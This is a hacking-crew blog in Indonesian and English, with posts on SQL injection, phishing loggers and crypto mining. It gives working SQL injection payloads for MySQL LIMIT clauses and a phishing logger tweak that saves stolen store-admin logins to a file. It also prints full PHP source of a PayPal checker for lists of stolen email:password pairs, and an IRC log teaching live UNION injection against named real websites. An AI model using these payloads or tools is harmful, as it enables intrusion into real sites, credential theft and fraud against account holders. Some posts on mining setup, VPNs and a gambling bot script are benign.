Y00AOebLhlCX59D11qensmHJY7s NyubiCrew Doc Created (c) by Princexells Seyka (Princelling Saki)

Rabu, 28 Januari 2015

0 SQL Injections in MySQL LIMIT clause

Countless number of articles was written on the exploitation of SQL Injections. This post is dedicated to a very specific situation. When assessing the severity of SQL Injection in certain application, I encountered a problem, which I was not able to solve quickly using web search. It’s about a question if SQL injection vulnerability in the LIMIT clause in MySQL 5.x database is currently exploitable.
Example query:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point

Of course, important is the fact that the above query contains ORDER BY clause. In MySQL we cannot use ORDER BY before UNION. If ORDER BY was not there it would be actually very easy to exploit it simply using just UNION syntax. The problem has appeared at stackoverflow and it was discussed at sla.ckers too. Sorry no results.
So let’s look at the syntax of the SELECT in the MySQL 5 documentation

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

After the LIMIT clause may occur following clauses: PROCEDURE and INTO. This INTO clause is not interesting, unless the application uses a database account with permission to write files, which nowadays is rather rare situation in the wild. It turns out that it is possible to solve our problem using PROCEDURE clause.
The only stored procedure available by default in MySQL is ANALYSE  (see docs).
Let’s give it a try:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE procedure can also take two parameters:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Does not bode us well. Let’s see whether the parameters of ANALYSE are evaluated.

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

gives us immediate response:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse
Therefore, sleep() is certainly not being called. I didn’t give up so fast and I finally found the vector:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

VoilĂ ! The above solution is based on handy known technique of so-called error based injection. If, therefore, our vulnerable web application discloses the errors of the database engine (this is a real chance, such bad practices are common), we solve the problem. What if our target doesn’t display errors? Are we still able to exploit it successfully?
It turns out that we can combine the above method with another well-known technique – time based injection. In this case, our solution will be as follows:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

It works. What is interesting that using SLEEP is not possible in this case. That’s why there must be a BENCHMARK instead.
Update: As BigBear pointed out in the comment, very similar solution was actually posted earlier on rdot. Thanks!
Update: It would be awesome if this technique is implemented in sqlmap.

Reference from X-ACE :
https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

Jumat, 23 Januari 2015

0 Another Trick Logger by home_edition2001

Disini saya akan menjelaskan tentang logger dimana kebanyakan akan mengirim lewat email, daripada email nya menumpuk dengan pembatasan kapasitas email dari pihak penyedia jasa email, maka kita bisa melakukan penghematan untuk target-target yang sering bertransaksi ato melewati halaman yang sudah kita tanam logger kita.

Saran saya sih agar memperhatikan resiko nya juga, karena bot google bisa saja mendeteksi jenis log file yang kita tanam untuk menggantikan text email yg kita dapatkan dari shop yang kita punya. Resiko ini juga sangat riskan apabila ada yg tidak sengaja menemukan log tersebut beredar di google search engine. Anyway tanggung sendiri ya resiko nya. ^_^

Sekedar info saja tutorial ini dibuat berdasarkan posting home_edition2001 di group nyubicrew facebook. Langsung ke script nya :

mail('[email protected]','Login store.apaaja.com',$psn); << baris ini di ganti dengan script ini
$fp = fopen('/home/bm/album/thumbs/store-apaaja-com-login-admin.txt', 'a');fwrite($fp, $psn);fclose($fp);

Sabtu, 27 Desember 2014

0 CGMINER run on startup LINUX only

Postingan kali ini adalah postingan dimana kita akan menyeting CGMINER bersama dengan pool yang telah kita punya secara otomatis. Setiap komputer ataupun raspberry restart / reboot / menyala dengan sendirinya maka CGMINER pun akan otomatis menyala kembali.

Untuk postingan tentang cara install cgminer di unbuntu atau di raspberry pi, silahkan anda lihat postingan sebelumnya yang sudah di jabarkan dengan jelas.

cara untuk auto start up di linux kita wajib untuk edit file :

sudo nano /etc/kbd/config

dan rubah POWERDOWN_TIME menjadi 0, kemudian rubah BLANK_TIME menjadi 0.

simpan dan lanjut ke file yang satu lagi :

sudo nano /etc/X11/xinit/xinitrc

kemudian tambahkan perintah :

xset s off         # don't activate screensaver
xset -dpms         # disable DPMS (Energy Star) features.
xset s noblank     # don't blank the video device

simpan dan lanjut lagi ke file yang terakhir :

sudo nano /etc/rc.local

lalu add perintah menjalankan cgminer sebelum exit 0 :

cd /direktoriCGMINER/
sudo ./cgminer -o <insert pool url> -u <username> -p <password>

itulah sekilas clue agar kita dapat mempermudah CGMINER berjalan lancar di linux. ^_^

0 Install CGMINER for your GRIDSEED ASIC SCRYPT MINER

Scrypt mining on a PC using GPUs can be very power intensive. With just one Radeon GPU, I was easily consuming over 200 watts of power to get about 333KH/s.

Using a Rapberry Pi is the a great choice when looking for a low power solution. With a Pi, this is a lot lower, normally in the 2 to 3 watt range.

I purchased a Gridseed ASIC These can hash about 360KH/s without overclocking and consume about 7 watts of power.

To power the Gridseed, I ordered this cable and hooked it up to an old PC power supply.

To power everything up:
1. Hookup the power cable to the 6 pin PCI-E power cable on the PC power supply
2. Hookup the USB cord to the ASIC, then into the Raspberry Pi USB port
3. Power on the Raspberry Pi

For this install, we are using the latest version of Raspbian found here.

Once your system comes up, you should be able to detect the Gridseed:

$ lsusb
Bus 001 Device 007: ID 0483:5740 STMicroelectronics STM32F407

Now that your device is connected and ready to go, let’s get the mining software.
There is a fork of cgminer, that is specifically designed for the Gridseed that we will use.

Let’s clone it and build!

Install git:

$ sudo apt-get install git

You may need these packages:

$ sudo apt-get install libncurses-dev libcurl4-openssl-dev libudev-dev

Clone cgminer:

$ git clone https://github.com/dtbartle/cgminer-gc3355.git

Build cgminer:

$ cd cgminer-gc3355
$ ./configure --enable-scrypt --enable-gridseed

This might take awhile to configure. Afterwards, you should see this output:

------------------------------------------------------------------------
cgminer 3.7.2
------------------------------------------------------------------------

Configuration Options Summary:

libcurl(GBT+getwork).: Enabled: -lcurl
curses.TUI...........: FOUND: -lncurses
scrypt...............: Enabled
OpenCL...............: Detection overrided. GPU mining support DISABLED
ADL..................: SDK NOT found, GPU monitoring support DISABLED

Avalon.ASICs.........: Disabled
BFL.ASICs............: Disabled
KnC.ASICs............: Disabled
BitForce.FPGAs.......: Disabled
BitFury.ASICs........: Disabled
Hashfast.ASICs.......: Disabled
GridSeed.ASICs.......: Enabled
Icarus.ASICs/FPGAs...: Disabled
Klondike.ASICs.......: Disabled
ModMiner.FPGAs.......: Disabled

Compilation............: make (or gmake)
CPPFLAGS.............:
CFLAGS...............: -g -O2
LDFLAGS..............: -lpthread
LDADD................: -lcurl compat/jansson-2.5/src/.libs/libjansson.a -lpthread -lm compat/libusb-1.0/libusb/.libs/libusb-1.0.a -ludev -lrt

Installation...........: make install (as root if needed, with 'su' or 'sudo')
prefix...............: /usr/local

This tells you that ASIC mining is enabled:
GridSeed.ASICs.......: Enabled

Now, we will compile cgminer, which should take awhile:

$ make

Use the cgminer binary to run against your favorite mining pool. You will need to use sudo, since it needs access to the USB device.
I am mining Dogecoin on nut2pools. Here is an example:

$ sudo ./cgminer --scrypt -o stratum+tcp://dogus.nut2pools.com:5585 -u XXX -p password --gridseed-options=baud=115200,freq=850,chips=5

You should see some output from cgminer, letting you know that is is all working:

cgminer version 3.7.2 - Started: [2014-06-02 05:53:47]
--------------------------------------------------------------------------------
(5s):359.5K (avg):360.1Kh/s | A:320 R:0 HW:0 WU:4.6/m
ST: 2 SS: 0 NB: 2 LW: 11 GF: 0 RF: 0
Connected to dogus.nut2pools.com diff 64 with stratum as user XXX
Block: 6b81ca93... Diff:812 Started: [05:53:51] Best share: 234
--------------------------------------------------------------------------------
[P]ool management [S]ettings [D]isplay options [Q]uit
GSD 0: 6D92285E4857 850 MHz | 360.0K/360.1Kh/s | A:320 R:0 HW:0 WU: 4.6/m
--------------------------------------------------------------------------------

[2014-06-02 05:53:45] Started cgminer 3.7.2
[2014-06-02 05:53:46] GridSeed options: 'baud=115200,freq=850,chips=5'
[2014-06-02 05:53:46] Device found, firmware version 01140113, driver version v3.8.5.20140210.02
[2014-06-02 05:53:46] System reseting
[2014-06-02 05:53:46] Set GC3355 core frequency to 850 MHz
[2014-06-02 05:53:46] Probing for an alive pool
[2014-06-02 05:53:47] Pool 0 difficulty changed to 64
[2014-06-02 05:53:47] Network diff set to 731
[2014-06-02 05:53:51] Network diff set to 812
[2014-06-02 05:53:51] Stratum from pool 0 detected new block
[2014-06-02 05:53:54] Accepted 015cce8d Diff 188/64 GSD 0
[2014-06-02 05:54:10] Accepted 02ae8b33 Diff 95/64 GSD 0
[2014-06-02 05:54:19] Accepted 020687a1 Diff 126/64 GSD 0
[2014-06-02 05:54:21] Accepted 011872eb Diff 234/64 GSD 0
[2014-06-02 05:54:27] Accepted 02860798 Diff 101/64 GSD 0

Now that this is running, I am saving a lot more power. Here is how we ended up:
Raspberry Pi = 2 watts
PC Powersupply = 20 watts
Total = 22 watts

Previous usage = 200 watts

This is about 10 times less which will help my PG&E power bill.

Happy Mining!

0 Config PPTP VPN with Raspberry Pi

Terkadang kita sering diblock oleh internet sehat milik pemerintah yang seenaknya ngeblock situs-situs yang seharus nya tidak perlu diblock.

Nah dengan Raspberry Pi kita dapat mengkonfigurasi settingan IP kita dengan memanfaatkan PPTP VPN yang bisa didapatkan secara gratis ataupun secara berbayar. Tutorial kali ini akan bermanfaat sekali bila anda memiliki beberapa komputer yang terkoneksi dalam 1 jaringan dimana kita dapat memanfaatkan raspberry pi untuk mengcover semua koneksi menggunakan PPTP VPN tanpa menyeting satu-satu.

Langsung saja langkah pertama kita harus install PPTP for Linux :

[email protected] ~ $ sudo apt-get install -y pptp-linux

setelah terinstall, maka kita langsung konek ke PPTP kita :

[email protected] ~ $ sudo pptpsetup --create unitedserver --server 128.199.208.xxx --username [email protected] --password xxx --encrypt --start

lalu kita arahkan traffic internet ke PPTP kita :

[email protected] ~ $ sudo route add -net "0.0.0.0/0" dev "ppp0"

selesai sudah, terakhir mari kita cek koneksi kita :

[email protected] ~ $ curl ipinfo.io/ip && curl ipinfo.io/org
128.199.208.xxx
AS133165 Baby Corp, Inc.

Nah selesai sudah maka anda akan bypass internet yg terblock oleh internet sehat ^_^

Senin, 03 November 2014

0 Cara Mendapatkan bitcoin dengan mudah !!!

Menurut para penggila online, saat ini bitcoin lagi gandrung2 nya, bahkan pernah mencapai 10 jt untuk 1 bitcoin.
Nah kali ini ada sebuah trik khusus dimana kita bisa menggenerate bitcoin agar semakin bertambah. terlebih dahulu kalian wajib memiliki account bitcoin. karena itu syarat wajib agar bisa mendapatkan 
cash money from bitcoin.

Nah setelah anda punya account bitcoin silahkan join langsung daftar ke situs f r e e b i t c o . i n, setelah itu langsung login dan mulai masukkan angka captha yg sudah tertera di situs tersebut lalu klik ROLL untuk mendapatkan BTC gratis, ingat jumlah BTC gratis ini akan semakin besar sesuai dengan ketampanan kalian, ^_^

Setelah mencapai 0,00001000 BTC maka saat ini lah waktunya untuk menggenerate BTC ini. Klik Multiply BTC lalu tekan CTRL + SHIFT + K ( untuk browser Mozzila ) atau CTRL + SHIFT + J ( untuk browser Chrome )

Setelah itu paste script ini ke browser bagian bawah lalu tekan enter. berikut isi script yg bisa auto bet HI di situs tersebut :

bconfig = {
  maxBet: 0.0002200,
  wait: 1000,
  autoexit: 0.00001,
  want: 0.000014,
  toggleHilo:false,
  startbal: 0,
  won: 0,
};
hilo = 'hi';
multiplier = 1;
rollDice = function() {

  if ($('#double_your_btc_bet_lose').html() !== '') {
    $('#double_your_btc_2x').click();
    multiplier = 1;
    if(bconfig.toggleHilo)toggleHiLo();
  } else {
    $('#double_your_btc_min').click();
    multiplier = 1;
  }

  if (parseFloat($('#balance').html()) < (parseFloat($('#double_your_btc_stake').val()) * 2) ||
    parseFloat($('#double_your_btc_stake').val()) > bconfig.maxBet) {
    console.log($('#double_your_btc_min'));
  }
  if (parseFloat($('#balance').html()) < bconfig.autoexit) {
    throw "exit";
  }
  if (parseFloat($('#balance').html()) > bconfig.want) {
        var num = parseFloat($('#balance').html());
        bconfig.want = num + 0.00000030;
        bconfig.autoexit = num - 0.00000420;
  bconfig.won++;
  var total = num - bconfig.startbal;
        console.log('Setting bconfig want to: ' + bconfig.want)
        console.log('Setting autoexit to: ' + bconfig.autoexit)
  console.log('Total won: ' + total + ' BTC')
  }

  $('#double_your_btc_bet_hi_button').click();

  setTimeout(rollDice, (multiplier * bconfig.wait) + Math.round(Math.random() * 1000));
};

toggleHiLo = function() {
  if (hilo === 'hi') {
    hilo = 'hi';
  } else {
    hilo = 'hi';
  }
};
var num = parseFloat($('#balance').html());
bconfig.startbal = num;
bconfig.want = num + 0.00000030;
bconfig.autoexit = num - 0.00000420;
rollDice();

Untuk melihat script ini jalan atau tidak nya lihat lah jumlah BTC kalian yg selalu berubah-ubah. Script ini sudah diuji coba dan sampai posting ini diterbitkan script masih tetap jalan. Kalau sudah bertambah banyak, silahkan reload browser untuk menghindari kekalahan. ^_^ 

Jumat, 24 Oktober 2014

0 Mass Paypal Verifier by GbLack

Tools ini di dapat dari teman yang memakai nick GbLack, silahkan dipakai tapi ingat hargai sang pembuat ya, karena memank itulah bentuk penghargaan atas tools yg telah dia buat dengan akal dan pikiran nya sendiri... :)

here the code :

<?php
/**********************************************************************
*                                                                     *
* Script name   : Mass PayPal Verify Checker                          *
* Info          : A little scipt to check email:passwords list for    *
*                 PayPal account whether the email is verified by     *
*                 PayPal or not. This is not login validity checker!  *
* Coded with    : Notepad++ v5.4.5 (UNICODE)                          *
* Coder         : gblack a.k.a biadabz                                *
* Thxz & Greetz : Dewi Jack XShadow inc0mp13te mywisdom t3cm4n bejamz *
*                 Vrs-hCk YaDoY666 s4va and You                       *
* Skid warning  : Don't ever rip my code or i will kill your mama!    *
*                                                                     *
**********************************************************************/
set_time_limit(0);
?>
<html>
<head>
<title>Mass PayPal Verify Checker by gblack</title>
<style>
body {
background-color: #FFFFFF;
color: #000000;
font-family: "Courier New";
font-size: 11px;
}
textarea {
background-color: #FFFFFF;
border: 1px solid;
border-color: #000000;
color: #000000;
font-family: "Courier New";
font-size: 11px;
}
input,select {
background-color: #FFFFFF;
border: 1px solid;
border-color: #000000;
color: #000000;
font-family: "Courier New";
font-size: 11px;
}
</style>
</head>
<body>
<img src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif"><h2>Mass PayPal Verify Checker by gblack</h2>
<form name="data" method="post">
<textarea name="lists" class="input" cols="37" rows="15">[email protected]:password</textarea><br>
Email:&nbsp;&nbsp;<input type="text" name="login" size="20"><br>
Passw:&nbsp;&nbsp;<input type="password" name="passw" size="20"><br><br>
<input type="submit" value="Check now!">
</form>
<?php
if($_POST['lists']) {
$mainz = "https://www.paypal.com/";
$login = trim($_POST['login']);
$passw = trim($_POST['passw']);
if(file_exists(getcwd().'/cookie.txt')) {
unlink(getcwd().'/cookie.txt');
}
$lists = split("\n", $_POST['lists']);
$a = new cURL();
$b = $a->get($mainz."/cgi-bin/webscr?cmd=_login-run");
preg_match("/dispatch=(.*?)\">/", $b, $dispatch);
$dispatch = $dispatch[1];
$c = new cURL();
$d = $c->post($mainz."/cgi-bin/webscr?cmd=_login-submit&amp;dispatch=".$dispatch, "login_email=".$login."&login_password=".$passw."&target_page=0&submit.x=Log+In");
if(preg_match("/<h2 class=\"accessAid\">Logging in<\/h2>/", $d)) {
preg_match("/login_access=(.*)\">/", $d, $access);
$access = $access[1];
print "<b>[+] Main account has been logged in...<br>";
print "[+] There are ".count($lists)." to be checked for verfication...</b><br><br>";
flush();
$e = new cURL();
$f = $e->get($mainz."/cgi-bin/webscr?cmd=_login-done&amp;login_access=".$access);
for($x = 0;$x < count($lists);$x++) {
print "[".($x+1)."] ".$lists[$x];
list($email, $password) = split(":", $lists[$x]);
flush();
$g = new cURL();
$h = $g->get($mainz."/cgi-bin/webscr?cmd=_seal-entry&pal=".$email);
if(preg_match("/<span class=\"inlineRed\">/", $h)) {
print "<font color='red'> - Not verified!</font>";
flush();
} else {
print "<font color='green'>";
if(preg_match("/<td class=\"emphasis\">/", $h)) {
$i = preg_split("/<td class=\"emphasis\">/", $h);
foreach($i as $j) {
preg_match("/(.*)<\/td>/", $j, $k);
print $k[1]." - ";
}
print "Good!</font>";
flush();
} else {
print "<font color='red'><br><br><b>[!] Error, access to this page is limited, try to change the main account!</b></font>";
exit;
}
}
print "<br>";
flush();
}
} else {
print "<font color='red'><b>[!] Error logging in the main account!</b></font>";
}
}
// Taken from somewhere else, with a bit modification ;)
class cURL {
var $callback = false;
function setCallback($func_name) {
$this->callback = $func_name;
}
function doRequest($method, $url, $vars) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_VERBOSE, 1);
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $vars);
}
$data = curl_exec($ch);
curl_close($ch);
if ($data) {
if ($this->callback) {
$callback = $this->callback;
$this->callback = false;
return call_user_func($callback, $data);
} else {
return $data;
}
} else {
return curl_error($ch);
}
}
function get($url) {
return $this->doRequest('GET', $url, 'NULL');
}
function post($url, $vars) {
return $this->doRequest('POST', $url, $vars);
}
}
?>
<hr>
<b>Coded [c] 2010 by gblack</b>
</body>
</html>

Senin, 15 September 2014

0 Live Tutor SQL

<&home_edition2001> wew
<&home_edition2001> cemana ini
<&home_edition2001> xix
<&home_edition2001> gimana mau lanjut
<+Bukan-Diriku> wewewewewewewew
<&home_edition2001> gak ada yang nanya
<+Bukan-Diriku> totong lakh
<&home_edition2001> gak ada yang apa
<&home_edition2001> wakak
* +anti_underground ([email protected]) Quit (Quit: )
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 and 1=0 << standart sql injek di php
<&home_edition2001> jika artikel ilang or webnya erorr
<&home_edition2001> xix
<&home_edition2001> dijamin bisa di injek
<&home_edition2001> wakkaka
<&home_edition2001> cape de
<&home_edition2001> sepi kali
<+Bukan-Diriku> hmm
<+Bukan-Diriku> lanjottttt
<+ayunk> Please check your credit card statement (monthly transaction history) either online or when it arrives in the mail from the credit card issuer. On this statement, you will see a $1.95 USD charge from PayPal. Next to this charge, you will see a 4-digit Expanded Use Number, which can be found directly before the word PAYPAL. Note that it may take 3-4 working days for the number to appear on your statement.
<&home_edition2001> wekekek
<&home_edition2001> mpos
<+Bukan-Diriku> lanjottttt
<+ayunk> hiks asyik
* +anti_polda ([email protected]) Quit (Ping timeout)
<&home_edition2001> nah itu web sudah + bisa di explorer
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0--
<&home_edition2001> cek
<&home_edition2001> this
<&home_edition2001> apa repostnya
<&home_edition2001> masih erorr kan
<&home_edition2001> wakak
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1--
<&home_edition2001> masih eror ya
<&home_edition2001> wakak
<&home_edition2001> sokor mpos
<&home_edition2001> lanjot
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2--
<&home_edition2001> wakkkaa
<+NoGe> kaga ada
<&home_edition2001> masih erorr juga
<&home_edition2001> gak ada NoGe
* anti_polda ([email protected]) has joined #nyubicrew
<&home_edition2001> gak ada apa NoGe
<&home_edition2001> wakak
<&home_edition2001> lanjut injeksinya
<&home_edition2001> sampe artikel yang tadi dibaca muncul lagi
<+setiawan> NOGE = Nongnong Gede
<+setiawan> ekee
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3--
<&home_edition2001> masih juga
<&home_edition2001> sialll
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4--
<&home_edition2001> masih juga
<&home_edition2001> duh server ngajakin ribut
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4,5--
<&home_edition2001> wew
* live sets mode: +v anti_polda
<&home_edition2001> trus ayo berusaha
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4,5,6--
<&home_edition2001> duh masih juga
<&home_edition2001> jangan bosen2 ya
<+Bukan-Diriku> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11--
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4,5,6,7--
<+Bukan-Diriku> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11--
<&home_edition2001> wew
<+NoGe> iya masih error kek tadi
<&home_edition2001> swet bukan diriku
<+Bukan-Diriku> tuh dah ga error
<+Bukan-Diriku> :D
<&home_edition2001> tu Bukan-Diriku udah ketemu
<&home_edition2001> kondisi true
<&home_edition2001> wakakaka
<&home_edition2001> sep
<+NoGe> tambahin ' juga kliatan error ne
<&home_edition2001> dengan menaikan angka tadi kita membuat kondis yang false jadi true
<&home_edition2001> udah paham lom sampe sini
<&home_edition2001> oke contoh lain
<&home_edition2001> gw ada ne
* +dayak ([email protected]) Quit (Ping timeout)
<+Bukan-Diriku> union select <---- ?
<&home_edition2001> jumlah2 angka itu gak jadi patokan musti 0-11
<&home_edition2001> apa aja ya
<+NoGe> so?
* +ayunk ikutan ... belajar
<+NoGe> donlot dolo video ne biar bisa konek2 dikit gw
<@live> MILDnet Info : INFO Wanna download mp3 join #INDOMP3
<&home_edition2001> http://www.translation.net/kb/index.html?ToDo=browse&catId=1 << coba sampe berapa
<&home_edition2001> ayo latihan mencari union
<&home_edition2001> wakakak
<&home_edition2001> ayo sapa bisa
<&home_edition2001> itu dasarnya
<+Bukan-Diriku> leletttttttttttttttttttttttt
* +needymax ([email protected]) Quit (Quit: )
<+Bukan-Diriku> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/u1/trans/html/kb/index.html on line 1613
<+Bukan-Diriku> No questions exist in the selected category. Go back
<&home_edition2001> masih tu
<&home_edition2001> wakka
<+NoGe> !ping me
<&home_edition2001> lanjut
<&home_edition2001> latihan jari
<&home_edition2001> mana anti_polda
<&home_edition2001> mana anti_polda
<&home_edition2001> mana anti_polda
<+Bukan-Diriku> View Questions by Category:
<&home_edition2001> mana anti_polda
<+Bukan-Diriku> 1 (72)
<+Bukan-Diriku>
<+Bukan-Diriku> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/u1/trans/html/kb/index.html on line 1613
<&home_edition2001> udah sampe berapa lo Bukan-Diriku
<&home_edition2001> masih tu
<+Bukan-Diriku> http://www.translation.net/kb/index.html?ToDo=browse&catId=1%20union%20select%200,1,2,3,4,5,6--
<&home_edition2001> sep
<+Bukan-Diriku> tuh
<&home_edition2001> mantab Bukan-Diriku
<&home_edition2001> wakaka
<&home_edition2001> jadi angka2 itu gak jadi patokan ya
<&home_edition2001> yang udah pasti adalah
<+Bukan-Diriku> siapp
* dayak ([email protected]) has joined #nyubicrew
<+Bukan-Diriku> angka2 ntu maksud na paan?
<&home_edition2001> untuk tes injekan harus pakai and 1=0 klo asp kan tanda '
<+NoGe> hmm..
<&home_edition2001> angka gak tau gak di jelasin
<&home_edition2001> wakaka
* &home_edition2001 juga gak tau
<+Bukan-Diriku> wedew
<&home_edition2001> gosipnya se tabel sql servernya
<+Bukan-Diriku> kek na seh
<+Bukan-Diriku> :D
<&home_edition2001> trus
<&home_edition2001> untuk injeksinya
<&home_edition2001> selanjutnya
<+NoGe> seep bius
* live sets mode: +v dayak
<+NoGe> lanjot
<+NoGe> apa lagi niy
<+NoGe> :))
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << kembali ke tanktop
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 << inikan angka 27
<&home_edition2001> lo tambahin tanda - di depannya
<&home_edition2001> jadi
<&home_edition2001> -27
<&home_edition2001> karena tanda - membuat si sql server erorr
<&home_edition2001> or gak di define kali
<+Bukan-Diriku> Gold 0.006471 0.2013 4.86 <-- wedew
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << ni jadinya
<&home_edition2001> tu cek apa yang lo liaty\
<&home_edition2001> wew
<&home_edition2001> sepi kali
<&home_edition2001> wakak
<&home_edition2001> !ping me
-BaWoeK- CyberMania Your PING Reply Is: 3secs
<+NoGe> ya bius
<+Bukan-Diriku> lanjoottt
<+Bukan-Diriku> 1
<+Bukan-Diriku> 3
<+Bukan-Diriku> [Download Document : 7]
<+Bukan-Diriku> Last Update 8
<+Bukan-Diriku> back
* +NoGe mah nyimak
<+NoGe> :)
<+NoGe> cuman gw lag
<+NoGe> iks
<+anti_polda> tampilan di esia newsnya keluar 1 3
<+anti_polda> 1
<+anti_polda> 3
<+anti_polda> [Download Document : 7]
<&home_edition2001> wew
<+NoGe> xial lag gw
<+anti_polda> trus apa lagi ///
<+Bukan-Diriku> Gold 0.006471 0.2013 4.86 <-- lom bisa bli rokok neh
<+NoGe> gpp lanjot la
<&home_edition2001> tau gak artinya
<+anti_polda> gk
<+Bukan-Diriku> ga
<&home_edition2001> artinya itu angka yang bisa di jadikan display untuk query
<&home_edition2001> tadi kan dah dapet kan angka dari 0-11
<&home_edition2001> nah berarti dari repot ini kita cuman bisa make angka 1 dan 3
<+NoGe> 1
<+NoGe> 3
<+NoGe> [Download Document : 7]
<+NoGe> Last Update 8
<+NoGe> back
<+NoGe> ya ya
* CYBER_GHOST ([email protected]_GHOST.users.mildnet.org) has joined #nyubicrew
<&home_edition2001> untuk mendajankan query
* +SateliT pamed
* +SateliT (I-Ha_[email protected]) Quit (Quit from MILDNet: )
<+NoGe> he`eh
<@live> MILDnet Info : INFO Wanna download mp3 join #INDOMP3
<+NoGe> oOo
<&home_edition2001> kek nya 7 dan 8 jug ade
* live sets mode: +v CYBER_GHOST
<+NoGe> next
<&home_edition2001> http://www.reversing.org/node/view/13 < buka ini untuk cek bener jalan gak qurynya
<+CYBER_GHOST> tq
* +MosDef ([email protected]) Quit (Ping timeout)
<&home_edition2001> Selectable blind objects
<&home_edition2001> In sqlbftools project readme are documented some of the objects available from a blind sql injection. This POC use some kind of bruteforce explained in this paper: adaptive dictionaries for bruteforce cracking
<&home_edition2001> Selectable blind objects are those who export important information about database manager, like functions or important values:
<&home_edition2001> * version(): current mysql version
<&home_edition2001> * database(): current database where user is connected
<&home_edition2001> * user(): connected to the database
<&home_edition2001> * system_user(): obvious
<&home_edition2001> * session_user()
<&home_edition2001> * current_user()
<&home_edition2001> * last_insert_id()
<&home_edition2001> * connection_id()
<&home_edition2001> tu untuk ceknya
<&home_edition2001> ada user()
<&home_edition2001> ada cenection_id()
<&home_edition2001> tu query or perintah sql
<&home_edition2001> yang bisa di jalankan oleh angka2 yang nimbul
<&home_edition2001> gw biasanya make version()
* MosDef ([email protected]) has joined #nyubicrew
<&home_edition2001> dan database()
* +Bukan-Diriku bRb pasang rokok dolow
<&home_edition2001> gimana menempatkannya
<&home_edition2001> mudah kok
<+Bukan-Diriku> bukan na database di bikin stress.. tapi pala gw yang stres.....kekekekkekekek :P~~~
* +The_Corrs ([email protected]) Quit (Ping timeout)
<&home_edition2001> tadi angka berapa aja yang keluar
<&home_edition2001> lupa
<+Bukan-Diriku> 1 3
<&home_edition2001> 1 3 7 8 ya
<&home_edition2001> ok
* live sets mode: +v MosDef
<&home_edition2001> kita pasang deh
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,now(),2,database(),4,5,6,user(),system_user(),9,10,11--
<+[^]YAMAHA[^]> brb matikan rokok Bukan-Diriku (( eh bang..!! kerja dolo baru merokok ))
<&home_edition2001> nah
* +[^]YAMAHA[^] brb matikan rokok Bukan-Diriku (( eh bang..!! kerja dolo baru merokok ))
